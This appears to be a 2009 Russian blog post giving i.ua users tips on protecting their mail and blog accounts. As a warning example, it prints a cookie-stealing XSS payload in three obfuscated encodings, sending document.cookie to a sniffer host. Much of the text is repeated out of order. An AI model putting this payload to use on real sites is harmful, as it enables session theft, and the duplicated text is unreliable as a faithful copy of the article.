Защити свой аккаунт.
- 16.06.09, 23:33
- Мой компьютер
Вам понравится, если украдут вашу почту, почтовый ящик, а заодно и ник регистрации в блоге? Уверен, что нет. Не все возможности защиты зависят от настроек сервера, и администраторов сайта, программистов.
К сожалению устройство блогов таково, что такая возможность как похищение пароля остаётся у взломщика. И поскольку не всё зависит от админов, то давайте посмотрим на то, что же можем и должны делать мы сами?
Мы можем зайти в настройки почтового ящика и оставить там сообщение:
"Не влезай - убьёт!", или:
"Стыришь мой пароль получишь в рожу!"
Ну, а теперь вполне серьёзно!
Что нужно для того чтобы не угнали ваш аккаунт?
2. Секретный вопрос для восстановления пароля должен тоже быть совершенно неожиданным. Точнее ответ на него. На пример, если вопрос выглядит так – Какая у Вас была кличка в школе?
Ответ можете сделать примерно таким - 1+1=44. А если - какая девичья фамилия Вашей матери – напишите - Кальмары в соусе.
3. Пользуйтесь безопасными браузерами. Я предпочитаю Mozilla Firefox…
Если вас перевело на главную попробуйте обновить страницу или просто закрыть вкладку. При обновлении страницы, если на другой вкладке вы уже вошли, вход будет произведён автоматически.
5. Ссылки. Будьте внимательны при прочтении писем, которые содержат ссылки. Если есть реальная необходимость перейти по ссылке которую прислали в письме, лучше скопируйте её и вставьте в новой вкладке браузера, или новом окне. Будьте внимательны обращайте внимание на то куда ведут ссылки. Смотрите по символам из которых состоит адрес ссылки. Дважды подумайте так ли для Вас важно проследовать по ссылке вида ужасного для вас совсем не понятного, типа:
%3C%73%63%72%69%70%74%3E%69%6D%67%3D%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6C%61%6E%65%74%79%2D%68%61%63%6B%65%72%61%6D%2E%72%75%2F%73%6E%69%66%66%2F%73%2E%67%69%66%3F%69%64%3D%32%31%32%38%26%22%2B%
64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
или
<script>img=new Image
;(); img.src="http://
0;lanety-hackeram.ru/s&#x
6E;iff/s.gif?id=2128&"+document.cookie;</script><script>img=new Image(); img.src="http://planety-hacke&#
114am.ru/sniff/s.gif?id=2128&"
+document.cookie;</script>
или
PHNjcmlwdD5pbWc9bmV3IEltYWdlKCk7IGltZy5zcmM9Imh0dHA6Ly9wbGFuZXR5LWhhY2tlcmFt LnJ1L3NuaWZmL3MuZ2lmP2lkPTIxMjgmIitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ+
(хотя эти методы чаще используются для обхода мер безопасности системы, обхода фильтров установленных администрацией, но в качестве примера - сгодится), а в почте же чаще могут попасться ссылки типа
http: g.i.ua?_url="http%3A%2F%2Fplanety-hackeram.ru%2Fsniff%2Fs.gif%3Fid%3D2128
Ведь так можно замаскировать ссылку, куда она ведёт, да и не только ссылку... то есть помните, что ссылки могут быть замаскированными и для перехода по ним из почты лучше копировать их и вставлять в адресную строку браузера на новой вкладке\окне...
Ну, да не будем отвлекаться. Что же нам понадобится ещё? Кроме нашего внимания и осторожности, хорошего пароля и немного ума?
6. Не игнорируйте сообщения своего браузера! Если он предупреждает вас о том, что вы собираетесь перейти на небезопасную страницу\сайт, не стоит убеждать себя, что это же i.ua! Что тут не может быть опасности... браузер как раз собирался вам сказать, что это вовсе не тот сайт о котором вы думали, что это подделка!
7. Не сообщайте никому свой пароль для входа в почту или на сайт. Если же вы по какой-то (надеюсь - действительно серьёзной) причине сделали это, смените пароль при первой возможности.
Я думаю, вобще то всё... и надеюсь, что меня возможно кто-то исправит, или дополнит. Со временем, когда оно появится я возможно дополню эту статью некоторыми нюансами, но в целом - всё.
А ссылки на программы для качественного управления паролями:
Генерация паролей, хранение паролей - будут попозже в сообществе 911.
Всего доброго, удачи.
P.S. Статья написана в контексте данного сайта, то есть специально для пользователей i.ua. Безусловно не всех.
К сожалению устройство блогов таково, что такая возможность как похищение пароля остаётся у взломщика. И поскольку не всё зависит от админов, то давайте посмотрим на то, что же можем и должны делать мы сами?
Мы можем зайти в настройки почтового ящика и оставить там сообщение:
"Не влезай - убьёт!", или:
"Стыришь мой пароль получишь в рожу!"
Ну, а теперь вполне серьёзно!
Что нужно для того чтобы не угнали ваш аккаунт?
Общие правила безопасности.1. Хороший, стойкий пароль, который не содержит символов из ваших имени и даты рождения. Особенно если они указаны на сайте, в анкете знакомств, при регистрации и т.п. Не используйте простые пароли, короче семи-шести символов.
"Дело в том, что мало кто выбирает себе пароль, как бессмысленный набор символов. По-этому при рассчетном
количестве вариантов (например 20 миллиардов) пользователями реально используются несколько сотен тысяч наиболее популярных паролей. Даже для дохлого компа перебор такого количества паролей - плевое дело. Есть еще так называемый "силовой метод". Это когда большое количество
вариантов перебирается несколькими мощными компами. Метод легко
масштабируется. Здесь вопрос подбора - лишь вопрос времени и наличия
вычислительных мощностей у взломщика. Но чтобы ускорить такую рутинную работу, для этого можно использовать
вирусы, если заразить, или подчинить(бот сети) большое количество компов, то все они будут
подбирать пароли."
количестве вариантов (например 20 миллиардов) пользователями реально используются несколько сотен тысяч наиболее популярных паролей. Даже для дохлого компа перебор такого количества паролей - плевое дело. Есть еще так называемый "силовой метод". Это когда большое количество
вариантов перебирается несколькими мощными компами. Метод легко
масштабируется. Здесь вопрос подбора - лишь вопрос времени и наличия
вычислительных мощностей у взломщика. Но чтобы ускорить такую рутинную работу, для этого можно использовать
вирусы, если заразить, или подчинить(бот сети) большое количество компов, то все они будут
подбирать пароли."
2. Секретный вопрос для восстановления пароля должен тоже быть совершенно неожиданным. Точнее ответ на него. На пример, если вопрос выглядит так – Какая у Вас была кличка в школе?
Ответ можете сделать примерно таким - 1+1=44. А если - какая девичья фамилия Вашей матери – напишите - Кальмары в соусе.
3. Пользуйтесь безопасными браузерами. Я предпочитаю Mozilla Firefox…
Правила безопасности в блоге и почте.
4. Если вы открыли пришедшее вам письмо, перешли по ссылке в нём, которая якобы указывает на сайт i.ua (в контексте этого сайта), но при этом попадаете на якобы главную страницу сайта, где снова нужно авторизироваться, помните, что вы Уже авторизированны на сайте, иначе не вошли бы в свою почту. Поэтому не стоит вводить повторно свои пароль и ник. Достаточно просто обновить страницу. Если вы, находясь на сайте, в почтовом ящике, то есть уже выполнили вход на сайт, при открытии новой страницы сайта получаете предложение ввести свои пароль и ник снова, ни в коем случае не делайте этого! Достаточно просто обновить страницу, хотя, для интереса вы можете, ввести свой ник, а пароль ввести Ложный. В том случае, если это поддельная страница вас может перенести на главную страницу сайта (а может и нет), в таком случае ваш поддельный пароль будет просто принят без вывода сообщения об ошибке, если же это настоящая страница (что в принципе не возможно, коль вы уже вошли) то вы получите сообщение об ошибке ->
Если вас перевело на главную попробуйте обновить страницу или просто закрыть вкладку. При обновлении страницы, если на другой вкладке вы уже вошли, вход будет произведён автоматически.
5. Ссылки. Будьте внимательны при прочтении писем, которые содержат ссылки. Если есть реальная необходимость перейти по ссылке которую прислали в письме, лучше скопируйте её и вставьте в новой вкладке браузера, или новом окне. Будьте внимательны обращайте внимание на то куда ведут ссылки. Смотрите по символам из которых состоит адрес ссылки. Дважды подумайте так ли для Вас важно проследовать по ссылке вида ужасного для вас совсем не понятного, типа:
%3C%73%63%72%69%70%74%3E%69%6D%67%3D%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6C%61%6E%65%74%79%2D%68%61%63%6B%65%72%61%6D%2E%72%75%2F%73%6E%69%66%66%2F%73%2E%67%69%66%3F%69%64%3D%32%31%32%38%26%22%2B%
64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
или
<script>img=new Image
;(); img.src="http://
0;lanety-hackeram.ru/s&#x
6E;iff/s.gif?id=2128&"+document.cookie;</script><script>img=new Image(); img.src="http://planety-hacke&#
114am.ru/sniff/s.gif?id=2128&"
+document.cookie;</script>
или
PHNjcmlwdD5pbWc9bmV3IEltYWdlKCk7IGltZy5zcmM9Imh0dHA6Ly9wbGFuZXR5LWhhY2tlcmFt LnJ1L3NuaWZmL3MuZ2lmP2lkPTIxMjgmIitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ+
(хотя эти методы чаще используются для обхода мер безопасности системы, обхода фильтров установленных администрацией, но в качестве примера - сгодится), а в почте же чаще могут попасться ссылки типа
http: g.i.ua?_url="http%3A%2F%2Fplanety-hackeram.ru%2Fsniff%2Fs.gif%3Fid%3D2128
Ведь так можно замаскировать ссылку, куда она ведёт, да и не только ссылку... то есть помните, что ссылки могут быть замаскированными и для перехода по ним из почты лучше копировать их и вставлять в адресную строку браузера на новой вкладке\окне...
Ну, да не будем отвлекаться. Что же нам понадобится ещё? Кроме нашего внимания и осторожности, хорошего пароля и немного ума?
6. Не игнорируйте сообщения своего браузера! Если он предупреждает вас о том, что вы собираетесь перейти на небезопасную страницу\сайт, не стоит убеждать себя, что это же i.ua! Что тут не может быть опасности... браузер как раз собирался вам сказать, что это вовсе не тот сайт о котором вы думали, что это подделка!
7. Не сообщайте никому свой пароль для входа в почту или на сайт. Если же вы по какой-то (надеюсь - действительно серьёзной) причине сделали это, смените пароль при первой возможности.
Я думаю, вобще то всё... и надеюсь, что меня возможно кто-то исправит, или дополнит. Со временем, когда оно появится я возможно дополню эту статью некоторыми нюансами, но в целом - всё.
А ссылки на программы для качественного управления паролями:
Генерация паролей, хранение паролей - будут попозже в сообществе 911.
Всего доброго, удачи.
P.S. Статья написана в контексте данного сайта, то есть специально для пользователей i.ua. Безусловно не всех.
67
